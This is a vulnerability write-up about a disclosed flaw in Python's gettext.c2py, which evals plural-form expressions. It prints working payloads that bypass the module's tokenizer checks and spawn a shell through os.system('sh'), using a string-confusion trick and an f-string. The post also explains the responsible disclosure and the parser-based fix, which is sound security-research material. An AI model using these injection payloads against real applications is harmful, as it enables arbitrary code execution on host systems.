Is eval safe yet? Arbitrary code execution in Python

TL;DR

Found use of eval in the Python gettext module. Bypassed weak security checks. Gained arbitrary code execution.

Background

In Beyond PEP 8, an excellent talk by Raymond Hettinger, he jokingly comments that namedtuple is implemented using eval (or exec, to be exact), and that this is defensible given the right circumstances. While that is sometimes true, I figured I'd clone the cpython repository and grep for any other uses of eval-like functions.

What caught my attention was the function c2py in the gettext module. The gettext module provides Python support for the gettext system, an internationalization and localization system. One of the responsibilities of gettext is to pick the right plural form of a message for a given count, and the rules for that differ from language to language. The plural forms for a language are defined using a C-like DSL, which is essentially a nested ternary expression with one enumerated outcome per plural form of that language. The only variable in the expression is always named n, and it holds the count for which a plural form should be returned.

For English, the gettext plural form is written as:

n != 1

The expression above evaluates to plural form 0 when n is 1 (singular) and to plural form 1 otherwise (plural). Other languages have more plural forms. Take Russian, for example:

n % 10 == 1 && n % 100 != 11 ? 0 : n % 10 >= 2 && n % 10 <= 4 && (n % 100 < 10 || n % 100 >= 20) ? 1 : 2

Eval to the rescue

Due to the expressiveness required by this language, writing a parser that evaluates these plural forms is not trivial. We could, however, translate these C-like expressions to Python and throw eval at them. The Russian plural form rewritten in Python looks like this:

(0 if n % 10 == 1 and n % 100 != 11 else (1 if n % 10 >= 2 and n % 10 <= 4 and (n % 100 < 10 or n % 100 >= 20) else 2))
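As a quick sanity check, the Python version of the Russian rule can be wrapped in a function (russian_plural is just a name chosen for this sketch) and evaluated for a few counts:

```python
def russian_plural(n: int) -> int:
    # Same expression as the Python translation above; returns the
    # plural-form index 0, 1 or 2 for the count n.
    return (0 if n % 10 == 1 and n % 100 != 11
            else (1 if n % 10 >= 2 and n % 10 <= 4 and (n % 100 < 10 or n % 100 >= 20)
                  else 2))


for count in (1, 2, 5, 11, 21, 22, 111):
    print(count, russian_plural(count))
```

Counts 1 and 21 map to form 0, 2 and 22 to form 1, and 5, 11 and 111 to form 2.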

Translating to Python and calling eval is exactly what c2py in the gettext module does. As the name suggests, it converts the C-like syntax to Python and then turns the result into a lambda function with eval:

eval('lambda n: int(%s)' % plural)
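As a rough illustration of the translate-then-eval idea, the hypothetical toy_c2py below only rewrites && and || into and/or and hands the result to the same 'lambda n: int(%s)' template. It is not the real c2py: it does no ternary conversion and no security checks at all, so it should never see untrusted input.

```python
def toy_c2py(plural: str):
    """Hypothetical, stripped-down c2py: rewrites && and ||, then evals."""
    # Swap the C logical operators for their Python equivalents.
    plural = plural.replace('&&', ' and ').replace('||', ' or ')
    # Same lambda template as c2py; int() turns True/False into 1/0.
    return eval('lambda n: int(%s)' % plural)


rule = toy_c2py('n % 10 == 1 && n % 100 != 11')
print([rule(k) for k in (1, 11, 21)])  # [1, 0, 1]
```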

A valid call to c2py could look something like this:

apples = ['Cox Orange', 'Granny Smith']
["apple", "apples"][gettext.c2py('n != 1')(len(apples))]

"apples"

Security

No one in their right mind would call eval on user input without the necessary security checks in place. The checks implemented in c2py make sure that n is the only variable allowed in the plural expression. They also do some general input validation, such as checking that parentheses are balanced.
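A rough reconstruction of that kind of check, written for illustration (only_n_names is a hypothetical name and this is not the exact CPython code), tokenizes the expression with the tokenize module and rejects any NAME token other than n. Tokenizer errors, such as the one raised for an unclosed parenthesis, are treated as failures:

```python
import io
import token
import tokenize


def only_n_names(expr: str) -> bool:
    """Hypothetical sketch: accept expr only if every NAME token is 'n'."""
    try:
        tokens = list(tokenize.generate_tokens(io.StringIO(expr).readline))
    except (tokenize.TokenError, SyntaxError):
        # Unbalanced parentheses surface as tokenizer errors.
        return False
    return all(tok.string == 'n' for tok in tokens if tok.type == token.NAME)


print(only_n_names('n != 1'))           # True
print(only_n_names('os.system("sh")'))  # False
print(only_n_names('n()'))              # True: only the *names* are checked
```

Note that 'n()' passes: the check looks at which names appear, not at how they are used.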

My first discovery was that the validation didn't prevent expressions that call n as a function. As long as every token that the Python tokenize module classifies as a NAME token is named n, the security checks pass. The following snippet successfully spawned a shell:

import gettext, os
gettext.c2py('n()')(lambda: os.system('sh'))

This isn't a high-risk issue, since the argument passed to the lambda will most likely be an integer produced by some counting logic, not user input.
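To see the n() behaviour without spawning anything, the sketch below feeds the 'lambda n: int(%s)' template directly to eval (bypassing c2py itself) and passes a harmless function as the "count". The payload function is a hypothetical stand-in for os.system('sh').

```python
# Same template c2py hands to eval; 'n()' contains no name other than n.
f = eval('lambda n: int(%s)' % 'n()')

calls = []


def payload():
    # Harmless stand-in for os.system('sh'): record the call, return a value.
    calls.append('called')
    return 42


print(f(payload))  # 42: whatever object is passed as n gets called
print(calls)       # ['called']
```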

Exploitation

Unable to take the function-call bug any further, I kept looking for ways to break the security checks. After a lot of trial and error, I found a way to confuse the Python tokenizer. If the tokenizer sees our entire input as a string, there are no NAME tokens to reject, so the input passes the security checks. Furthermore, it doesn't even have to be a valid string: the checks pass even though the tokenizer returns a result containing an ERRORTOKEN. The following input passes the security checks but breaks during evaluation:

gettext.c2py('"eval(foo) ""')
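The string trick is easy to reproduce with the tokenize module itself. The sketch below uses a closed variant of the payload, '"(eval(foo) && "', so that it is a well-formed string literal and tokenizes the same way across Python 3 versions; the unterminated original may be reported differently (or rejected) by newer tokenizers. Everything that matters ends up inside a single STRING token, leaving no NAME tokens for the check to reject:

```python
import io
import token
import tokenize

payload = '"(eval(foo) && "'  # a complete, valid string literal

kinds = [(token.tok_name[t.type], t.string)
         for t in tokenize.generate_tokens(io.StringIO(payload).readline)]
names = [s for kind, s in kinds if kind == 'NAME']

print(kinds[0])  # ('STRING', '"(eval(foo) && "')
print(names)     # []: eval and foo are hidden inside the string
```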

Next on the agenda is making sure the invalid string we entered is actually interpreted as a valid expression. Since we've bypassed the tokenizer, the code that translates the input and rebuilds the Python expression assumes that all parentheses are matched. When a left parenthesis is never closed, that code keeps only what follows it, so everything before it, including the opening double quote, is silently dropped. If we insert a left parenthesis after the first double quote, and a boolean operator such as && before the empty string, we get a valid expression:

gettext.c2py('"(eval(foo) && ""')(0)

----> 1 gettext.c2py('"(eval(foo) && ""')(0)
   gettext.pyc in <lambda>(n)
   NameError: global name 'foo' is not defined
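The parenthesis handling can be sketched in isolation. rebuild is a hypothetical, simplified helper modelled on the approach described above: it rewrites && and || to and/or, rebuilds the expression with a stack of strings (one per open parenthesis), and returns only the top of the stack. It omits c2py's ternary rewriting, and the exact CPython code may differ:

```python
def rebuild(plural: str) -> str:
    """Hypothetical, simplified model of c2py's rewriting (no ternaries)."""
    plural = plural.replace('&&', ' and ').replace('||', ' or ')
    stack = ['']  # one string per currently open parenthesis level
    for c in plural:
        if c == '(':
            stack.append('')              # open a new level
        elif c == ')':
            if len(stack) == 1:
                raise ValueError('unbalanced parenthesis')
            inner = stack.pop()           # close the innermost level ...
            stack[-1] += '(%s)' % inner   # ... and splice it into its parent
        else:
            stack[-1] += c
    # Only the top of the stack is returned: with an unmatched '(' the
    # text before it (here, the leading double quote) is lost.
    return stack.pop()


print(rebuild('(n % 10 == 1) && (n != 11)'))  # (n % 10 == 1)  and  (n != 11)
print(rebuild('"(eval(foo) && ""'))           # eval(foo)  and  ""
```

Plugged into the 'lambda n: int(%s)' template, the second result gives a lambda whose body calls eval(foo), which matches the NameError above.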

From here, spawning a shell is trivial. The gettext module imports the os module, and the lambda built by eval inside c2py resolves names in gettext's module globals, so all we need to do to get full access to the host system is:

gettext.c2py('"(os.system(\'sh\') & ""')(0)

$
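The trailing & "" might look like it spoils the payload, but Python evaluates the left operand first, so the call has already run by the time int & str raises TypeError. The sketch below shows this with a harmless side_effect function (a hypothetical stand-in for os.system) placed in roughly the lambda c2py ends up building for this input:

```python
calls = []


def side_effect():
    # Stand-in for os.system('sh'): record that it ran, return an exit status.
    calls.append('ran')
    return 0


# Roughly the lambda built for '"(os.system(\'sh\') & ""', with a safe call.
f = eval('lambda n: int(side_effect() & "")', {'side_effect': side_effect})

try:
    f(0)
except TypeError as exc:
    print('TypeError:', exc)

print(calls)  # ['ran']: the call happened before the TypeError
```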

Enter Python 3.6

Giving the tokenizer-based security a second thought, I wondered how it would react to the formatted string literals (f-strings) introduced in Python 3.6. (Not so) surprisingly, the tokenizer gives these strings no special attention, and calling c2py with an f-string just works:

gettext.c2py('f"{os.system(\'sh\')}"')(0)

$
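The tokenizer behaviour here is version-dependent. As far as I know, Python 3.6 through 3.11 tokenize an f-string as a single STRING token, so the names inside the braces never reach a NAME check; since Python 3.12 (PEP 701) the tokenize module emits separate tokens for f-string parts, including NAME tokens for the replacement fields. The hypothetical helper name_tokens below lists the NAME tokens so you can check this on your own interpreter:

```python
import io
import sys
import token
import tokenize


def name_tokens(expr: str) -> list:
    """Hypothetical helper: the NAME tokens a tokenize-based check would see."""
    toks = tokenize.generate_tokens(io.StringIO(expr).readline)
    return [t.string for t in toks if t.type == token.NAME]


payload = 'f"{os.system(\'sh\')}"'
# Expected: [] on 3.6-3.11 (one STRING token), names such as 'os' on 3.12+.
print(sys.version_info[:2], name_tokens(payload))
```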

Conclusion

This bug was first disclosed to security@python.org, and later added to the Python issue tracker because of its low-risk nature. These plural forms are generally specified in PO files, which are an unlikely attack vector.

The issue was resolved by implementing an actual parser for the gettext plural form language.
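To make the idea of "an actual parser" concrete, here is a minimal recursive-descent evaluator written for illustration. It is not CPython's implementation; compile_plural and its helpers are hypothetical, and the grammar is assumed to be limited to n, non-negative integer literals, parentheses, !, the C arithmetic, comparison and logical operators, and ?:. Because it builds Python closures instead of source code, there is nothing for eval to execute, and any character outside the grammar is rejected up front.

```python
import operator
import re

# Tokens of the assumed plural-form grammar; anything else is rejected.
_TOKEN = re.compile(r'\s*(\d+|n|\|\||&&|==|!=|<=|>=|[-+*/%<>!?:()])')


def _bin(fn):
    # Build a node that evaluates both operands and applies fn.
    return lambda lhs, rhs: lambda n: int(fn(lhs(n), rhs(n)))


# Binary operators from lowest to highest precedence, as in C.
_LEVELS = [
    {'||': lambda lhs, rhs: lambda n: int(bool(lhs(n)) or bool(rhs(n)))},
    {'&&': lambda lhs, rhs: lambda n: int(bool(lhs(n)) and bool(rhs(n)))},
    {'==': _bin(operator.eq), '!=': _bin(operator.ne)},
    {'<': _bin(operator.lt), '<=': _bin(operator.le),
     '>': _bin(operator.gt), '>=': _bin(operator.ge)},
    {'+': _bin(operator.add), '-': _bin(operator.sub)},
    # Floor division matches C division only for non-negative operands.
    {'*': _bin(operator.mul), '/': _bin(operator.floordiv),
     '%': _bin(operator.mod)},
]


def _tokenize(src):
    src, pos, tokens = src.rstrip(), 0, []
    while pos < len(src):
        m = _TOKEN.match(src, pos)
        if m is None:
            raise ValueError('invalid plural expression at offset %d' % pos)
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


class _Parser:
    def __init__(self, tokens):
        self.tokens, self.pos = tokens, 0

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError('unexpected token %r' % (tok,))
        self.pos += 1
        return tok

    def ternary(self):
        # cond ? yes : no, right-associative as in C.
        cond = self.binary(0)
        if self.peek() != '?':
            return cond
        self.take('?')
        yes = self.ternary()
        self.take(':')
        no = self.ternary()
        return lambda n: yes(n) if cond(n) else no(n)

    def binary(self, level):
        if level == len(_LEVELS):
            return self.unary()
        node = self.binary(level + 1)
        while self.peek() in _LEVELS[level]:
            build = _LEVELS[level][self.take()]
            node = build(node, self.binary(level + 1))
        return node

    def unary(self):
        if self.peek() == '!':
            self.take('!')
            inner = self.unary()
            return lambda n: int(not inner(n))
        return self.primary()

    def primary(self):
        tok = self.take()
        if tok == '(':
            inner = self.ternary()
            self.take(')')
            return inner
        if tok == 'n':
            return lambda n: n
        if tok.isdigit():
            value = int(tok)
            return lambda n: value
        raise ValueError('unexpected token %r' % (tok,))


def compile_plural(src):
    """Hypothetical safe replacement for c2py: no eval, only closures."""
    parser = _Parser(_tokenize(src))
    expr = parser.ternary()
    if parser.peek() is not None:
        raise ValueError('trailing input in plural expression')
    return lambda n: int(expr(n))
```

For example, compile_plural('n != 1')(1) returns 0, while compile_plural('n()') and both string-based payloads above raise ValueError instead of producing anything callable.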